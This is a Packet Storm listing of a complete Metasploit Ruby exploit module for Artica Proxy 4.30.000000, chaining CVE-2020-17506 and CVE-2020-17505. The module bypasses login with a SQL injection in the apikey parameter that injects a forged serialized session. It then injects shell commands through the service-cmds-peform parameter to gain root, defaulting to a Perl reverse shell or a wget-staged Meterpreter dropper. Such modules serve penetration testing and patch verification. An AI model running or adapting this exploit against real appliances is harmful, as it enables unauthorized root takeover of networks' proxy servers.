exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Artica Proxy 4.30.000000 Authentication Bypass / Command Injection

Artica Proxy 4.30.000000 Authentication Bypass / Command Injection
Posted Sep 22, 2020
Authored by Redouane Niboucha, Max0x4141 | Site metasploit.com

This Metasploit module exploits an authenticated command injection vulnerability in Artica Proxy, combined with an authentication bypass discovered on the same version, it is possible to trigger the vulnerability without knowing the credentials. The application runs in a virtual appliance and successful exploitation of this vulnerability yields remote code execution as root on the remote system.

tags | exploit, remote, root, code execution
advisories | CVE-2020-17505, CVE-2020-17506
SHA-256 | 078f133f8a5eb45e3921bb8de3c7d640fa15b03306907ebf439e915e4be64e2a

Artica Proxy 4.30.000000 Authentication Bypass / Command Injection

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Artica proxy 4.30.000000 Auth Bypass service-cmds-peform Command Injection',
'Description' => %q{
This module exploits an authenticated command injection vulnerability in Artica Proxy, combined with an authentication bypass
discovered on the same version, it is possible to trigger the vulnerability without knowing the credentials.
The application runs in virtual appliance, successful exploitation of this vulnerability yields remote code execution as root on the
remote system.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Max0x4141', # discovery
'Redouane NIBOUCHA <rniboucha[at]yahoo.fr>' # msf module
],
'References' =>
[
['CVE', '2020-17505'], # RCE
['CVE', '2020-17506'], # Auth bypass
['EDB', '48744'],
['PACKETSTORM', '158868'],
['URL', 'https://blog.max0x4141.com/post/artica_proxy/']
],
'DefaultOptions' =>
{
'SSL' => true,
'RPort' => 9000
},
'Platform' => %w[unix linux],
'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
'Targets' => [
[
'Unix Command',
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Type' => :unix_command,
'DefaultOptions' => {
'PAYLOAD' => 'cmd/unix/reverse_perl'
}
],
[
'Linux Dropper',
'Platform' => 'linux',
'Arch' => [ARCH_X86, ARCH_X64],
'Type' => :linux_dropper,
'DefaultOptions' => {
'CMDSTAGER::FLAVOR' => 'wget',
'PAYLOAD' => 'linux/x86/meterpreter_reverse_tcp'
}
]
],
'Privileged' => true,
'DisclosureDate' => '2020-08-09',
'DefaultTarget' => 1,
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [IOC_IN_LOGS]
}
)
)

register_options(
[
OptString.new('TARGETURI', [true, 'The URI of the vulnerable Artica Proxy', '/']),
OptString.new('PHPSESSID', [false, 'The cookie obtained after successful authentication, if present'])
]
)

# XXX: https://github.com/rapid7/metasploit-framework/issues/12963
import_target_defaults
end

def check
if datastore['PHPSESSID']
@phpsessid = datastore['PHPSESSID']
else
check_result = auth_bypass
return check_result unless check_result == CheckCode::Vulnerable

@phpsessid = check_result.reason
end
rand_string = Rex::Text.rand_text_alphanumeric(4..16)
if execute_command("echo #{Rex::Text.encode_base64(rand_string)}|base64 -d").include?(rand_string)
CheckCode::Appears
else
CheckCode::Safe
end
end

def execute_command(cmd, _opts = {})
print_status 'Attempting to gain RCE via CVE-2020-17505'
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'cyrus.index.php'),
'vars_get' => {
'service-cmds-peform' => "||#{Rex::Text.uri_encode(cmd, 'hex-all')}||"
},
'cookie' => "PHPSESSID=#{@phpsessid}; AsWebStatisticsCooKie=1; shellinaboxCooKie=1"
})
res ? res.body : ''
end

def auth_bypass
serialized_object = 'a:2:{s:3:"uid";s:4:"-100";s:22:"ACTIVE_DIRECTORY_INDEX";s:1:"1";}'
apikey = "' UNION select 1,'#{Rex::Text.encode_base64(serialized_object)}';"
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'fw.login.php'),
'vars_get' => {
'apikey' => apikey
}
})
return Exploit::CheckCode::Unknown("Unable to connect to #{target_uri.path}") unless res
return Exploit::CheckCode::Safe('Authentication failed') unless res && [200, 301, 302].include?(res.code)

Exploit::CheckCode::Vulnerable(res.get_cookies[/PHPSESSID=(.+?);/, 1])
end

def exploit
if datastore['PHPSESSID']
@phpsessid = datastore['PHPSESSID']
else
print_status 'Attempting to bypass authentication via CVE-2020-17506 (SQL injection)'
bypass_result = auth_bypass
case bypass_result
when CheckCode::Safe then fail_with(Failure::NoAccess, bypass_result.reason)
when CheckCode::Unknown then fail_with(Failure::Unknown, bypass_result.reason)
else @phpsessid = bypass_result.reason
end
end
print_good "Session cookie : #{@phpsessid}"
case target['Type']
when :unix_command then execute_command(payload.encoded)
when :linux_dropper then execute_cmdstager
else
fail_with(Failure::BadConfig, 'Invalid target specified')
end
end
end
Login or Register to add favorites

File Archive:

July 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    27 Files
  • 2
    Jul 2nd
    10 Files
  • 3
    Jul 3rd
    35 Files
  • 4
    Jul 4th
    27 Files
  • 5
    Jul 5th
    18 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    28 Files
  • 9
    Jul 9th
    44 Files
  • 10
    Jul 10th
    24 Files
  • 11
    Jul 11th
    25 Files
  • 12
    Jul 12th
    11 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    0 Files
  • 16
    Jul 16th
    0 Files
  • 17
    Jul 17th
    0 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close